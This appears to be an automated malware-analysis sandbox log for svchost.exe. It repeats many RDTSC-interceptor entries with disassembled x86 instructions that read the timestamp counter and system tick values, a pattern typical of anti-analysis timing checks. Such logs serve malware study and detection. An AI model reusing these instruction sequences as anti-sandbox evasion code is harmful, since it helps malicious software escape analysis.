Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59524h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FBB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59130h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59113h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul 